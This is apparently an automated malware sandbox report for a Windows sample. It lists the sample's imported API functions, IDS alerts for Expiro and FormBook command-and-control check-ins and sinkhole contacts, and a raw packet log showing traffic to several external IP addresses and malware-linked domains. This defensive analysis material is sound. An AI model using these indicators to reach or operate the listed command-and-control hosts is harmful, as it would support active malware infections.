                                                                              USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                              GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                              COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                                              ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                              SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                              ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                              OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                                                                              Language of compilation systemCountry where language is spokenMap
                                                                              EnglishGreat Britain
                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                              2024-12-09T08:31:42.841913+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.74970518.141.10.10780TCP
                                                                              2024-12-09T08:31:43.820628+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz154.244.188.17780192.168.2.749706TCP
                                                                              2024-12-09T08:31:43.820628+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst154.244.188.17780192.168.2.749706TCP
                                                                              2024-12-09T08:31:47.049148+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.141.10.10780192.168.2.749707TCP
                                                                              2024-12-09T08:31:47.049148+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.141.10.10780192.168.2.749707TCP
                                                                              2024-12-09T08:31:51.722646+01002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.7559261.1.1.153UDP
                                                                              2024-12-09T08:31:51.782086+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz144.221.84.10580192.168.2.749709TCP
                                                                              2024-12-09T08:31:51.782086+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst144.221.84.10580192.168.2.749709TCP
                                                                              2024-12-09T08:32:00.400791+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.7550111.1.1.153UDP
                                                                              2024-12-09T08:32:39.722151+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749722217.70.184.5080TCP
                                                                              2024-12-09T08:32:48.923482+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.74972082.112.184.19780TCP
                                                                              2024-12-09T08:32:56.947433+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749735154.23.184.20780TCP
                                                                              2024-12-09T08:32:59.612568+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749741154.23.184.20780TCP
                                                                              2024-12-09T08:33:02.268891+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749747154.23.184.20780TCP
                                                                              2024-12-09T08:33:04.952823+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749753154.23.184.20780TCP
                                                                              2024-12-09T08:33:12.398406+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74977438.165.29.23480TCP
                                                                              2024-12-09T08:33:15.082147+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74978138.165.29.23480TCP
                                                                              2024-12-09T08:33:17.769352+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74978738.165.29.23480TCP
                                                                              2024-12-09T08:33:21.001094+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.74979338.165.29.23480TCP
                                                                              2024-12-09T08:33:27.762203+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74981313.248.169.4880TCP
                                                                              2024-12-09T08:33:30.438993+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74982013.248.169.4880TCP
                                                                              2024-12-09T08:33:33.198157+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74982613.248.169.4880TCP
                                                                              2024-12-09T08:33:36.031248+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.74983313.248.169.4880TCP
                                                                              2024-12-09T08:33:37.375955+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz147.129.31.21280192.168.2.749837TCP
                                                                              2024-12-09T08:33:37.375955+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst147.129.31.21280192.168.2.749837TCP
                                                                              2024-12-09T08:33:40.161940+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz113.251.16.15080192.168.2.749844TCP
                                                                              2024-12-09T08:33:40.161940+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst113.251.16.15080192.168.2.749844TCP
                                                                              2024-12-09T08:33:43.193931+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749852156.251.17.22480TCP
                                                                              2024-12-09T08:33:47.285549+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749865156.251.17.22480TCP
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Dec 9, 2024 08:31:40.144814968 CET4970480192.168.2.754.244.188.177
                                                                              Dec 9, 2024 08:31:40.264324903 CET804970454.244.188.177192.168.2.7
                                                                              Dec 9, 2024 08:31:40.264421940 CET4970480192.168.2.754.244.188.177
                                                                              Dec 9, 2024 08:31:40.299113989 CET4970480192.168.2.754.244.188.177
                                                                              Dec 9, 2024 08:31:40.299176931 CET4970480192.168.2.754.244.188.177
                                                                              Dec 9, 2024 08:31:40.418941975 CET804970454.244.188.177192.168.2.7
                                                                              Dec 9, 2024 08:31:40.418962955 CET804970454.244.188.177192.168.2.7
                                                                              Dec 9, 2024 08:31:41.614429951 CET804970454.244.188.177192.168.2.7
                                                                              Dec 9, 2024 08:31:41.614525080 CET804970454.244.188.177192.168.2.7
                                                                              Dec 9, 2024 08:31:41.614603043 CET4970480192.168.2.754.244.188.177
                                                                              Dec 9, 2024 08:31:41.615576029 CET4970480192.168.2.754.244.188.177
                                                                              Dec 9, 2024 08:31:41.734776974 CET804970454.244.188.177192.168.2.7
                                                                              Dec 9, 2024 08:31:42.194926023 CET4970580192.168.2.718.141.10.107
                                                                              Dec 9, 2024 08:31:42.222265005 CET4970680192.168.2.754.244.188.177
                                                                              Dec 9, 2024 08:31:42.314371109 CET804970518.141.10.107192.168.2.7
                                                                              Dec 9, 2024 08:31:42.317981958 CET4970580192.168.2.718.141.10.107
                                                                              Dec 9, 2024 08:31:42.342973948 CET804970654.244.188.177192.168.2.7
                                                                              Dec 9, 2024 08:31:42.344731092 CET4970680192.168.2.754.244.188.177
                                                                              Dec 9, 2024 08:31:42.358186007 CET4970580192.168.2.718.141.10.107
                                                                              Dec 9, 2024 08:31:42.358269930 CET4970580192.168.2.718.141.10.107
                                                                              Dec 9, 2024 08:31:42.358412027 CET4970680192.168.2.754.244.188.177
                                                                              Dec 9, 2024 08:31:42.358468056 CET4970680192.168.2.754.244.188.177
                                                                              Dec 9, 2024 08:31:42.477546930 CET804970518.141.10.107192.168.2.7
                                                                              Dec 9, 2024 08:31:42.477562904 CET804970518.141.10.107192.168.2.7
                                                                              Dec 9, 2024 08:31:42.477703094 CET804970654.244.188.177192.168.2.7
                                                                              Dec 9, 2024 08:31:42.477713108 CET804970654.244.188.177192.168.2.7
                                                                              Dec 9, 2024 08:31:42.841912985 CET4970580192.168.2.718.141.10.107
                                                                              Dec 9, 2024 08:31:43.700547934 CET804970654.244.188.177192.168.2.7
                                                                              Dec 9, 2024 08:31:43.700591087 CET804970654.244.188.177192.168.2.7
                                                                              Dec 9, 2024 08:31:43.700721025 CET4970680192.168.2.754.244.188.177
                                                                              Dec 9, 2024 08:31:43.701277971 CET4970680192.168.2.754.244.188.177
                                                                              Dec 9, 2024 08:31:43.820627928 CET804970654.244.188.177192.168.2.7
                                                                              Dec 9, 2024 08:31:44.616206884 CET4970780192.168.2.718.141.10.107
                                                                              Dec 9, 2024 08:31:44.735572100 CET804970718.141.10.107192.168.2.7
                                                                              Dec 9, 2024 08:31:44.735637903 CET4970780192.168.2.718.141.10.107
                                                                              Dec 9, 2024 08:31:44.739836931 CET4970780192.168.2.718.141.10.107
                                                                              Dec 9, 2024 08:31:44.739856958 CET4970780192.168.2.718.141.10.107
                                                                              Dec 9, 2024 08:31:44.859174967 CET804970718.141.10.107192.168.2.7
                                                                              Dec 9, 2024 08:31:44.859189034 CET804970718.141.10.107192.168.2.7
                                                                              Dec 9, 2024 08:31:46.800705910 CET804970718.141.10.107192.168.2.7
                                                                              Dec 9, 2024 08:31:46.800734043 CET804970718.141.10.107192.168.2.7
                                                                              Dec 9, 2024 08:31:46.800806046 CET4970780192.168.2.718.141.10.107
                                                                              Dec 9, 2024 08:31:46.825609922 CET4970780192.168.2.718.141.10.107
                                                                              Dec 9, 2024 08:31:47.049148083 CET804970718.141.10.107192.168.2.7
                                                                              Dec 9, 2024 08:31:48.300734043 CET4970880192.168.2.754.244.188.177
                                                                              Dec 9, 2024 08:31:48.420073032 CET804970854.244.188.177192.168.2.7
                                                                              Dec 9, 2024 08:31:48.420185089 CET4970880192.168.2.754.244.188.177
                                                                              Dec 9, 2024 08:31:48.420357943 CET4970880192.168.2.754.244.188.177
                                                                              Dec 9, 2024 08:31:48.420357943 CET4970880192.168.2.754.244.188.177
                                                                              Dec 9, 2024 08:31:48.539602995 CET804970854.244.188.177192.168.2.7
                                                                              Dec 9, 2024 08:31:48.539616108 CET804970854.244.188.177192.168.2.7
                                                                              Dec 9, 2024 08:31:49.770889997 CET804970854.244.188.177192.168.2.7
                                                                              Dec 9, 2024 08:31:49.770915031 CET804970854.244.188.177192.168.2.7
                                                                              Dec 9, 2024 08:31:49.770977020 CET4970880192.168.2.754.244.188.177
                                                                              Dec 9, 2024 08:31:49.771068096 CET4970880192.168.2.754.244.188.177
                                                                              Dec 9, 2024 08:31:49.890273094 CET804970854.244.188.177192.168.2.7
                                                                              Dec 9, 2024 08:32:01.053976059 CET4971880192.168.2.718.141.10.107
                                                                              Dec 9, 2024 08:32:01.173389912 CET804971818.141.10.107192.168.2.7
                                                                              Dec 9, 2024 08:32:01.173990965 CET4971880192.168.2.718.141.10.107
                                                                              Dec 9, 2024 08:32:01.175236940 CET4971880192.168.2.718.141.10.107
                                                                              Dec 9, 2024 08:32:01.175236940 CET4971880192.168.2.718.141.10.107
                                                                              Dec 9, 2024 08:32:01.294523001 CET804971818.141.10.107192.168.2.7
                                                                              Dec 9, 2024 08:32:01.294538021 CET804971818.141.10.107192.168.2.7
                                                                              Dec 9, 2024 08:32:03.207288027 CET804971818.141.10.107192.168.2.7
                                                                              Dec 9, 2024 08:32:03.207391024 CET804971818.141.10.107192.168.2.7
                                                                              Dec 9, 2024 08:32:03.207477093 CET4971880192.168.2.718.141.10.107
                                                                              Dec 9, 2024 08:32:03.207770109 CET4971880192.168.2.718.141.10.107
                                                                              Dec 9, 2024 08:32:03.326916933 CET804971818.141.10.107192.168.2.7
                                                                              Dec 9, 2024 08:32:38.347681999 CET4972280192.168.2.7217.70.184.50
                                                                              Dec 9, 2024 08:32:38.467055082 CET8049722217.70.184.50192.168.2.7
                                                                              Dec 9, 2024 08:32:38.467143059 CET4972280192.168.2.7217.70.184.50
                                                                              Dec 9, 2024 08:32:38.480850935 CET4972280192.168.2.7217.70.184.50
                                                                              Dec 9, 2024 08:32:38.600145102 CET8049722217.70.184.50192.168.2.7
                                                                              Dec 9, 2024 08:32:39.721884012 CET8049722217.70.184.50192.168.2.7
                                                                              Dec 9, 2024 08:32:39.722048044 CET8049722217.70.184.50192.168.2.7
                                                                              Dec 9, 2024 08:32:39.722059965 CET8049722217.70.184.50192.168.2.7
                                                                              Dec 9, 2024 08:32:39.722151041 CET4972280192.168.2.7217.70.184.50
                                                                              Dec 9, 2024 08:32:39.722976923 CET8049722217.70.184.50192.168.2.7
                                                                              Dec 9, 2024 08:32:39.723028898 CET4972280192.168.2.7217.70.184.50
                                                                              Dec 9, 2024 08:32:39.783660889 CET4972280192.168.2.7217.70.184.50
                                                                              Dec 9, 2024 08:32:39.904103041 CET8049722217.70.184.50192.168.2.7
                                                                              Dec 9, 2024 08:32:55.298798084 CET4973580192.168.2.7154.23.184.207
                                                                              Dec 9, 2024 08:32:55.418049097 CET8049735154.23.184.207192.168.2.7
                                                                              Dec 9, 2024 08:32:55.418132067 CET4973580192.168.2.7154.23.184.207
                                                                              Dec 9, 2024 08:32:55.440675974 CET4973580192.168.2.7154.23.184.207
                                                                              Dec 9, 2024 08:32:55.559952021 CET8049735154.23.184.207192.168.2.7
                                                                              Dec 9, 2024 08:32:56.947251081 CET8049735154.23.184.207192.168.2.7
                                                                              Dec 9, 2024 08:32:56.947372913 CET8049735154.23.184.207192.168.2.7
                                                                              Dec 9, 2024 08:32:56.947432995 CET4973580192.168.2.7154.23.184.207
                                                                              Dec 9, 2024 08:32:56.956296921 CET4973580192.168.2.7154.23.184.207
                                                                              Dec 9, 2024 08:32:57.974914074 CET4974180192.168.2.7154.23.184.207
                                                                              Dec 9, 2024 08:32:58.094176054 CET8049741154.23.184.207192.168.2.7
                                                                              Dec 9, 2024 08:32:58.094271898 CET4974180192.168.2.7154.23.184.207
                                                                              Dec 9, 2024 08:32:58.109345913 CET4974180192.168.2.7154.23.184.207
                                                                              Dec 9, 2024 08:32:58.228816032 CET8049741154.23.184.207192.168.2.7
                                                                              Dec 9, 2024 08:32:59.612567902 CET4974180192.168.2.7154.23.184.207
                                                                              Dec 9, 2024 08:32:59.630390882 CET8049741154.23.184.207192.168.2.7
                                                                              Dec 9, 2024 08:32:59.630445004 CET4974180192.168.2.7154.23.184.207
                                                                              Dec 9, 2024 08:32:59.630516052 CET8049741154.23.184.207192.168.2.7
                                                                              Dec 9, 2024 08:32:59.630564928 CET4974180192.168.2.7154.23.184.207
                                                                              Dec 9, 2024 08:32:59.732279062 CET8049741154.23.184.207192.168.2.7
                                                                              Dec 9, 2024 08:32:59.732331038 CET4974180192.168.2.7154.23.184.207
                                                                              Dec 9, 2024 08:33:00.631737947 CET4974780192.168.2.7154.23.184.207
                                                                              Dec 9, 2024 08:33:00.751030922 CET8049747154.23.184.207192.168.2.7
                                                                              Dec 9, 2024 08:33:00.751122952 CET4974780192.168.2.7154.23.184.207
                                                                              Dec 9, 2024 08:33:00.766001940 CET4974780192.168.2.7154.23.184.207
                                                                              Dec 9, 2024 08:33:00.885658026 CET8049747154.23.184.207192.168.2.7
                                                                              Dec 9, 2024 08:33:00.885713100 CET8049747154.23.184.207192.168.2.7
                                                                              Dec 9, 2024 08:33:02.268891096 CET4974780192.168.2.7154.23.184.207
                                                                              Dec 9, 2024 08:33:02.388498068 CET8049747154.23.184.207192.168.2.7
                                                                              Dec 9, 2024 08:33:02.388561010 CET4974780192.168.2.7154.23.184.207
                                                                              Dec 9, 2024 08:33:03.287523985 CET4975380192.168.2.7154.23.184.207
                                                                              Dec 9, 2024 08:33:03.406832933 CET8049753154.23.184.207192.168.2.7
                                                                              Dec 9, 2024 08:33:03.407068014 CET4975380192.168.2.7154.23.184.207
                                                                              Dec 9, 2024 08:33:03.422480106 CET4975380192.168.2.7154.23.184.207
                                                                              Dec 9, 2024 08:33:03.542632103 CET8049753154.23.184.207192.168.2.7
                                                                              Dec 9, 2024 08:33:04.952549934 CET8049753154.23.184.207192.168.2.7
                                                                              Dec 9, 2024 08:33:04.952653885 CET8049753154.23.184.207192.168.2.7
                                                                              Dec 9, 2024 08:33:04.952822924 CET4975380192.168.2.7154.23.184.207
                                                                              Dec 9, 2024 08:33:04.955790043 CET4975380192.168.2.7154.23.184.207
                                                                              Dec 9, 2024 08:33:05.075467110 CET8049753154.23.184.207192.168.2.7
                                                                              Dec 9, 2024 08:33:10.745676994 CET4977480192.168.2.738.165.29.234
                                                                              Dec 9, 2024 08:33:10.865279913 CET804977438.165.29.234192.168.2.7
                                                                              Dec 9, 2024 08:33:10.865356922 CET4977480192.168.2.738.165.29.234
                                                                              Dec 9, 2024 08:33:10.879636049 CET4977480192.168.2.738.165.29.234
                                                                              Dec 9, 2024 08:33:10.998950005 CET804977438.165.29.234192.168.2.7
                                                                              Dec 9, 2024 08:33:12.398406029 CET4977480192.168.2.738.165.29.234
                                                                              Dec 9, 2024 08:33:12.518085957 CET804977438.165.29.234192.168.2.7
                                                                              Dec 9, 2024 08:33:12.518136978 CET4977480192.168.2.738.165.29.234
                                                                              Dec 9, 2024 08:33:13.442301035 CET4978180192.168.2.738.165.29.234
                                                                              Dec 9, 2024 08:33:13.561600924 CET804978138.165.29.234192.168.2.7
                                                                              Dec 9, 2024 08:33:13.561701059 CET4978180192.168.2.738.165.29.234
                                                                              Dec 9, 2024 08:33:13.576628923 CET4978180192.168.2.738.165.29.234
                                                                              Dec 9, 2024 08:33:13.696708918 CET804978138.165.29.234192.168.2.7
                                                                              Dec 9, 2024 08:33:15.082146883 CET4978180192.168.2.738.165.29.234
                                                                              Dec 9, 2024 08:33:15.201570988 CET804978138.165.29.234192.168.2.7
                                                                              Dec 9, 2024 08:33:15.203742027 CET4978180192.168.2.738.165.29.234
                                                                              Dec 9, 2024 08:33:16.127859116 CET4978780192.168.2.738.165.29.234
                                                                              Dec 9, 2024 08:33:16.247345924 CET804978738.165.29.234192.168.2.7
                                                                              Dec 9, 2024 08:33:16.247421980 CET4978780192.168.2.738.165.29.234
                                                                              Dec 9, 2024 08:33:16.262901068 CET4978780192.168.2.738.165.29.234
                                                                              Dec 9, 2024 08:33:16.382402897 CET804978738.165.29.234192.168.2.7
                                                                              Dec 9, 2024 08:33:16.382427931 CET804978738.165.29.234192.168.2.7
                                                                              Dec 9, 2024 08:33:17.769351959 CET4978780192.168.2.738.165.29.234
                                                                              Dec 9, 2024 08:33:17.889033079 CET804978738.165.29.234192.168.2.7
                                                                              Dec 9, 2024 08:33:17.889087915 CET4978780192.168.2.738.165.29.234
                                                                              Dec 9, 2024 08:33:18.962379932 CET4979380192.168.2.738.165.29.234
                                                                              Dec 9, 2024 08:33:19.081717014 CET804979338.165.29.234192.168.2.7
                                                                              Dec 9, 2024 08:33:19.084290981 CET4979380192.168.2.738.165.29.234
                                                                              Dec 9, 2024 08:33:19.121292114 CET4979380192.168.2.738.165.29.234
                                                                              Dec 9, 2024 08:33:19.307404041 CET804979338.165.29.234192.168.2.7
                                                                              Dec 9, 2024 08:33:21.000924110 CET804979338.165.29.234192.168.2.7
                                                                              Dec 9, 2024 08:33:21.000977993 CET804979338.165.29.234192.168.2.7
                                                                              Dec 9, 2024 08:33:21.001094103 CET4979380192.168.2.738.165.29.234
                                                                              Dec 9, 2024 08:33:21.003957987 CET4979380192.168.2.738.165.29.234
                                                                              Dec 9, 2024 08:33:21.123198032 CET804979338.165.29.234192.168.2.7
                                                                              Dec 9, 2024 08:33:26.542510033 CET4981380192.168.2.713.248.169.48
                                                                              Dec 9, 2024 08:33:26.661931038 CET804981313.248.169.48192.168.2.7
                                                                              Dec 9, 2024 08:33:26.662014008 CET4981380192.168.2.713.248.169.48
                                                                              Dec 9, 2024 08:33:26.687251091 CET4981380192.168.2.713.248.169.48
                                                                              Dec 9, 2024 08:33:26.806612968 CET804981313.248.169.48192.168.2.7
                                                                              Dec 9, 2024 08:33:27.761787891 CET804981313.248.169.48192.168.2.7
                                                                              Dec 9, 2024 08:33:27.761956930 CET804981313.248.169.48192.168.2.7
                                                                              Dec 9, 2024 08:33:27.762202978 CET4981380192.168.2.713.248.169.48
                                                                              Dec 9, 2024 08:33:28.191359997 CET4981380192.168.2.713.248.169.48
                                                                              Dec 9, 2024 08:33:29.219882965 CET4982080192.168.2.713.248.169.48
                                                                              Dec 9, 2024 08:33:29.339569092 CET804982013.248.169.48192.168.2.7
                                                                              Dec 9, 2024 08:33:29.339792967 CET4982080192.168.2.713.248.169.48
                                                                              Dec 9, 2024 08:33:29.432353020 CET4982080192.168.2.713.248.169.48
                                                                              Dec 9, 2024 08:33:29.551588058 CET804982013.248.169.48192.168.2.7
                                                                              Dec 9, 2024 08:33:30.438803911 CET804982013.248.169.48192.168.2.7
                                                                              Dec 9, 2024 08:33:30.438930035 CET804982013.248.169.48192.168.2.7
                                                                              Dec 9, 2024 08:33:30.438992977 CET4982080192.168.2.713.248.169.48
                                                                              Dec 9, 2024 08:33:30.941185951 CET4982080192.168.2.713.248.169.48
                                                                              Dec 9, 2024 08:33:31.966738939 CET4982680192.168.2.713.248.169.48
                                                                              Dec 9, 2024 08:33:32.086633921 CET804982613.248.169.48192.168.2.7
                                                                              Dec 9, 2024 08:33:32.088783026 CET4982680192.168.2.713.248.169.48
                                                                              Dec 9, 2024 08:33:32.217272043 CET4982680192.168.2.713.248.169.48
                                                                              Dec 9, 2024 08:33:32.336508036 CET804982613.248.169.48192.168.2.7
                                                                              Dec 9, 2024 08:33:32.336616039 CET804982613.248.169.48192.168.2.7
                                                                              Dec 9, 2024 08:33:33.186393976 CET804982613.248.169.48192.168.2.7
                                                                              Dec 9, 2024 08:33:33.194412947 CET804982613.248.169.48192.168.2.7
                                                                              Dec 9, 2024 08:33:33.198157072 CET4982680192.168.2.713.248.169.48
                                                                              Dec 9, 2024 08:33:33.722485065 CET4982680192.168.2.713.248.169.48
                                                                              Dec 9, 2024 08:33:34.811151981 CET4983380192.168.2.713.248.169.48
                                                                              Dec 9, 2024 08:33:34.930412054 CET804983313.248.169.48192.168.2.7
                                                                              Dec 9, 2024 08:33:34.930507898 CET4983380192.168.2.713.248.169.48
                                                                              Dec 9, 2024 08:33:35.062782049 CET4983380192.168.2.713.248.169.48
                                                                              Dec 9, 2024 08:33:35.182060003 CET804983313.248.169.48192.168.2.7
                                                                              Dec 9, 2024 08:33:36.030951023 CET804983313.248.169.48192.168.2.7
                                                                              Dec 9, 2024 08:33:36.031095982 CET804983313.248.169.48192.168.2.7
                                                                              Dec 9, 2024 08:33:36.031248093 CET4983380192.168.2.713.248.169.48
                                                                              Dec 9, 2024 08:33:36.036645889 CET4983380192.168.2.713.248.169.48
                                                                              Dec 9, 2024 08:33:36.155915976 CET804983313.248.169.48192.168.2.7
                                                                              Dec 9, 2024 08:33:41.570846081 CET4985280192.168.2.7156.251.17.224
                                                                              Dec 9, 2024 08:33:41.690174103 CET8049852156.251.17.224192.168.2.7
                                                                              Dec 9, 2024 08:33:41.690252066 CET4985280192.168.2.7156.251.17.224
                                                                              Dec 9, 2024 08:33:41.707206964 CET4985280192.168.2.7156.251.17.224
                                                                              Dec 9, 2024 08:33:41.826498985 CET8049852156.251.17.224192.168.2.7
                                                                              Dec 9, 2024 08:33:42.411303043 CET4985780192.168.2.718.141.10.107
                                                                              Dec 9, 2024 08:33:42.530536890 CET804985718.141.10.107192.168.2.7
                                                                              Dec 9, 2024 08:33:42.532876968 CET4985780192.168.2.718.141.10.107
                                                                              Dec 9, 2024 08:33:42.533005953 CET4985780192.168.2.718.141.10.107
                                                                              Dec 9, 2024 08:33:42.533005953 CET4985780192.168.2.718.141.10.107
                                                                              Dec 9, 2024 08:33:42.824950933 CET804985718.141.10.107192.168.2.7
                                                                              Dec 9, 2024 08:33:42.824966908 CET804985718.141.10.107192.168.2.7
                                                                              Dec 9, 2024 08:33:43.193639994 CET8049852156.251.17.224192.168.2.7
                                                                              Dec 9, 2024 08:33:43.193855047 CET8049852156.251.17.224192.168.2.7
                                                                              Dec 9, 2024 08:33:43.193931103 CET4985280192.168.2.7156.251.17.224
                                                                              Dec 9, 2024 08:33:44.568409920 CET804985718.141.10.107192.168.2.7
                                                                              Dec 9, 2024 08:33:44.568500996 CET804985718.141.10.107192.168.2.7
                                                                              Dec 9, 2024 08:33:44.568567991 CET4985780192.168.2.718.141.10.107
                                                                              Dec 9, 2024 08:33:44.568670988 CET4985780192.168.2.718.141.10.107
                                                                              Dec 9, 2024 08:33:44.628895044 CET4985280192.168.2.7156.251.17.224
                                                                              Dec 9, 2024 08:33:44.688004971 CET804985718.141.10.107192.168.2.7
                                                                              Dec 9, 2024 08:33:45.647500992 CET4986580192.168.2.7156.251.17.224
                                                                              Dec 9, 2024 08:33:45.766844034 CET8049865156.251.17.224192.168.2.7
                                                                              Dec 9, 2024 08:33:45.767119884 CET4986580192.168.2.7156.251.17.224
                                                                              Dec 9, 2024 08:33:45.782782078 CET4986580192.168.2.7156.251.17.224
                                                                              Dec 9, 2024 08:33:45.902163982 CET8049865156.251.17.224192.168.2.7
                                                                              Dec 9, 2024 08:33:47.284848928 CET8049865156.251.17.224192.168.2.7
                                                                              Dec 9, 2024 08:33:47.285063982 CET8049865156.251.17.224192.168.2.7
